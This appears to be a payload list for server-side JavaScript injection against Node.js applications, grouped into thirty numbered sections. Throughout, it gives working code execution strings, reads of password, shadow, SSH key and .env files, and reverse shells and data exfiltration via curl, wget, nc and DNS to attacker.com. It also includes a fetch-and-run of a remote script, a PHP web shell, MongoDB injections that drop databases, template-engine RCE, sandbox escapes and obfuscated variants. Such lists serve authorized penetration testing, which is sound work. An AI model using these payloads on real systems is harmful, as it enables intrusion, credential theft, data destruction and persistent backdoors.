# Server-Side JavaScript Injection (SSJI) Payloads

# ============================================
# 1. BASIC eval() INJECTION
# ============================================

# Simple expressions
2+2
Math.random()
Date.now()
JSON.stringify({})

# Information disclosure
process.version
process.platform
process.arch
process.pid
process.cwd()
process.env
global
this

# File system access
require('fs').readFileSync('/etc/passwd', 'utf8')
require('fs').readFileSync('/etc/shadow', 'utf8')
require('fs').readFileSync('/proc/self/environ', 'utf8')
require('fs').readdirSync('/').toString()
require('fs').readdirSync('/home').toString()
require('fs').readFileSync('package.json', 'utf8')
require('fs').readFileSync('.env', 'utf8')

# ============================================
# 2. REMOTE CODE EXECUTION (RCE)
# ============================================

# Basic command execution
require('child_process').execSync('whoami').toString()
require('child_process').execSync('id').toString()
require('child_process').execSync('pwd').toString()
require('child_process').execSync('ls -la').toString()
require('child_process').execSync('cat /etc/passwd').toString()
require('child_process').execSync('uname -a').toString()

# Reverse shell
require('child_process').exec('bash -i >& /dev/tcp/attacker.com/4444 0>&1')
require('child_process').exec('nc -e /bin/bash attacker.com 4444')
require('child_process').spawn('nc', ['-e', '/bin/bash', 'attacker.com', '4444'])

# Data exfiltration
require('child_process').execSync('curl attacker.com/?data=$(cat /etc/passwd|base64)').toString()
require('child_process').execSync('wget --post-file=/etc/passwd attacker.com').toString()

# Write backdoor
require('fs').writeFileSync('/tmp/backdoor.js', 'malicious code')
require('fs').writeFileSync('shell.php', '<?php system($_GET["cmd"]); ?>')

# ============================================
# 3. FUNCTION CONSTRUCTOR INJECTION
# ============================================

# Basic Function constructor
new Function('return 2+2')()
new Function('return process.version')()
new Function('return require("os").userInfo()')()

# RCE via Function constructor
new Function('return require("child_process").execSync("whoami").toString()')()
new Function('return global.process.mainModule.require("child_process").execSync("id").toString()')()

# ============================================
# 4. MONGODB $where INJECTION
# ============================================

# Basic MongoDB injection
admin' || '1'=='1
' || true || '
' || '1'=='1' || '
'; return true; //
admin'; return true; //

# MongoDB data exfiltration
'; return this.password.match(/^a/); //
'; return this.email.includes("admin"); //
'; return this.role == "admin"; //

# MongoDB enumeration
'; var users = db.users.find(); return true; //
'; db.users.find().forEach(function(u){print(u)}); return true; //

# MongoDB command execution (if possible)
'; require('child_process').execSync('whoami'); return true; //
'; var fs = require('fs'); fs.readFileSync('/etc/passwd'); return true; //

# MongoDB DoS
'; while(true){}; //
'; db.users.drop(); return true; //
'; db.dropDatabase(); return true; //

# ============================================
# 5. TEMPLATE INJECTION (HANDLEBARS)
# ============================================

# Handlebars RCE
{{#with "s" as |string|}}
  {{#with "e"}}
    {{#with split as |conslist|}}
      {{this.pop}}
      {{this.push (lookup string.sub "constructor")}}
      {{this.pop}}
      {{#with string.split as |codelist|}}
        {{this.pop}}
        {{this.push "return require('child_process').execSync('whoami');"}}
        {{this.pop}}
        {{#each conslist}}
          {{#with (string.sub.apply 0 codelist)}}
            {{this}}
          {{/with}}
        {{/each}}
      {{/with}}
    {{/with}}
  {{/with}}
{{/with}}

# Simplified Handlebars payload
{{this}}
{{this.constructor}}
{{this.constructor.constructor}}

# ============================================
# 6. EJS TEMPLATE INJECTION
# ============================================

<%= global.process.mainModule.require('child_process').execSync('whoami') %>
<%= require('child_process').execSync('cat /etc/passwd').toString() %>
<%= global.process.mainModule.require('fs').readFileSync('/etc/passwd', 'utf8') %>
<%= process.env %>
<%= JSON.stringify(process.env) %>

# ============================================
# 7. PUG/JADE TEMPLATE INJECTION
# ============================================

#{global.process.mainModule.require('child_process').execSync('id')}
#{function(){return require('child_process').execSync('whoami')}()}
#{require('child_process').execSync('cat /etc/passwd').toString()}
- var x = global.process.mainModule.require('child_process').execSync('ls').toString()
= x

# ============================================
# 8. VM SANDBOX ESCAPE
# ============================================

# Constructor chain escape
this.constructor.constructor('return process')()
this.constructor.constructor('return global')()
({}).constructor.constructor('return this')()

# Process access
this.constructor.constructor('return process')().mainModule.require('child_process').execSync('whoami').toString()
(function(){return this.constructor.constructor('return process')()})()
({}).constructor.constructor('return global.process.mainModule.require("child_process").execSync("id").toString()')()

# Alternative escapes
(function(){return this})().constructor.constructor('return process')()
arguments.callee.caller.constructor('return process')()

# ============================================
# 9. PROTOTYPE POLLUTION TO RCE
# ============================================

# Prototype pollution
{"__proto__": {"isAdmin": true}}
{"__proto__": {"polluted": "yes"}}
{"constructor": {"prototype": {"isAdmin": true}}}

# Pollution leading to RCE
{"__proto__": {"toString": "require('child_process').execSync('whoami').toString()"}}
{"__proto__": {"valueOf": "require('child_process').execSync('id')"}}

# ============================================
# 10. SETTIMEOUT/SETINTERVAL INJECTION
# ============================================

require('child_process').exec('curl attacker.com/?data=$(whoami)')
require('fs').writeFileSync('/tmp/pwned', 'hacked')
require('child_process').execSync('nc attacker.com 4444 -e /bin/bash')
global.process.exit(1)

# ============================================
# 11. REQUIRE VARIATIONS
# ============================================

# Direct require
require('child_process')
require('fs')
require('net')
require('http')

# Global require
global.require('child_process')
global.process.mainModule.require('child_process')

# Module constructor
process.mainModule.constructor._load('child_process')
global.process.mainModule.constructor._load('fs')

# ============================================
# 12. ENVIRONMENT VARIABLE EXFILTRATION
# ============================================

process.env
JSON.stringify(process.env)
process.env.PATH
process.env.HOME
process.env.USER
process.env.SECRET_KEY
process.env.DATABASE_URL
process.env.API_KEY

# ============================================
# 13. FILE READ VARIATIONS
# ============================================

# Read sensitive files
require('fs').readFileSync('/etc/passwd', 'utf8')
require('fs').readFileSync('/etc/shadow', 'utf8')
require('fs').readFileSync('/etc/hosts', 'utf8')
require('fs').readFileSync('/proc/self/environ', 'utf8')
require('fs').readFileSync('/home/user/.ssh/id_rsa', 'utf8')
require('fs').readFileSync('config/database.yml', 'utf8')
require('fs').readFileSync('.env', 'utf8')
require('fs').readFileSync('package.json', 'utf8')

# Directory listing
require('fs').readdirSync('/').toString()
require('fs').readdirSync('/etc').toString()
require('fs').readdirSync('/home').toString()
require('fs').readdirSync('.').toString()

# ============================================
# 14. COMMAND INJECTION VIA CHILD_PROCESS
# ============================================

# exec variations
require('child_process').exec('cat /etc/passwd', (e,o)=>console.log(o))
require('child_process').execSync('whoami').toString()
require('child_process').execFileSync('ls', ['-la']).toString()

# spawn variations
require('child_process').spawn('cat', ['/etc/passwd'])
require('child_process').spawnSync('id').stdout.toString()

# ============================================
# 15. NETWORK OPERATIONS
# ============================================

# HTTP request
require('http').get('http://attacker.com/?data=exfiltrated')
require('https').get('https://attacker.com/?data=' + process.env.SECRET)

# DNS exfiltration
require('dns').resolve4(process.env.SECRET + '.attacker.com')

# Socket connection
require('net').connect(4444, 'attacker.com')

# ============================================
# 16. PROCESS MANIPULATION
# ============================================

process.exit(1)
process.kill(process.pid)
process.chdir('/')
process.binding('spawn_sync')

# ============================================
# 17. CRYPTO MODULE ACCESS
# ============================================

require('crypto').randomBytes(16).toString('hex')
require('crypto').getHashes()
require('crypto').getCiphers()

# ============================================
# 18. OS MODULE ACCESS
# ============================================

require('os').userInfo()
require('os').hostname()
require('os').platform()
require('os').arch()
require('os').cpus()
require('os').networkInterfaces()
require('os').tmpdir()
require('os').homedir()

# ============================================
# 19. PATH MODULE FOR TRAVERSAL
# ============================================

require('path').resolve('/etc/passwd')
require('path').join(__dirname, '../../../etc/passwd')

# ============================================
# 20. MONGODB SPECIFIC INJECTIONS
# ============================================

# $function aggregation (MongoDB 4.4+)
{$function: {
  body: function() { return require('child_process').execSync('whoami').toString(); },
  args: [],
  lang: "js"
}}

# mapReduce injection
{
  map: function() { require('child_process').exec('curl attacker.com/?data=pwned'); emit(this._id, 1); },
  reduce: function(k, v) { return Array.sum(v); }
}

# ============================================
# 21. EXPRESS SPECIFIC
# ============================================

# res.render with unsafe data
<%= user.input %>
#{user.input}
{{user.input}}

# ============================================
# 22. WEBPACK/BUNDLER SPECIFIC
# ============================================

__webpack_require__
__non_webpack_require__

# ============================================
# 23. ELECTRON SPECIFIC
# ============================================

require('electron').remote.require('child_process')
require('electron').ipcRenderer.send('exploit')

# ============================================
# 24. OBFUSCATED PAYLOADS
# ============================================

# String concatenation
req+'uire'('child_'+'process').exec('whoami')

# Unicode escaping
require('\u0063\u0068\u0069\u006c\u0064\u005f\u0070\u0072\u006f\u0063\u0065\u0073\u0073')

# Hex encoding
require(Buffer.from('6368696c645f70726f63657373', 'hex').toString())

# Base64
require(Buffer.from('Y2hpbGRfcHJvY2Vzcw==', 'base64').toString())

# Computed property access
global['pro'+'cess'].mainModule['req'+'uire']('child_process')

# ============================================
# 25. NESTING AND CHAINING
# ============================================

require('child_process').exec('wget http://attacker.com/shell.sh -O /tmp/s.sh && bash /tmp/s.sh')
require('child_process').execSync('curl attacker.com/$(cat /etc/passwd | base64)').toString()

# ============================================
# 26. TIME-BASED BLIND SSJI
# ============================================

require('child_process').execSync('sleep 5')
setTimeout(function(){}, 5000)
require('child_process').execSync('ping -c 5 attacker.com')

# ============================================
# 27. OUT-OF-BAND DATA EXFILTRATION
# ============================================

require('child_process').execSync('curl attacker.com -d "$(cat /etc/passwd)"')
require('child_process').execSync('wget --post-data="$(env)" attacker.com')
require('child_process').execSync('nslookup $(whoami).attacker.com')

# ============================================
# 28. WRITESTREAM FOR PERSISTENCE
# ============================================

require('fs').createWriteStream('/tmp/backdoor.js').write('malicious code')

# ============================================
# 29. REGEX DOS (ReDoS) via SSJI
# ============================================

/(a+)+b/.test('aaaaaaaaaaaaaaaaaaaaaa!')
/(a|a)*b/.test('aaaaaaaaaaaaaaaaaaaaaa!')

# ============================================
# 30. TESTING PAYLOADS
# ============================================

# Detection payloads
throw new Error('SSJI Test')
console.log('SSJI_TEST_' + Date.now())
require('fs').writeFileSync('/tmp/ssji_test_' + Date.now(), 'test')

# Simple arithmetic to confirm execution
7*7
Math.sqrt(16)
[1,2,3].join(',')
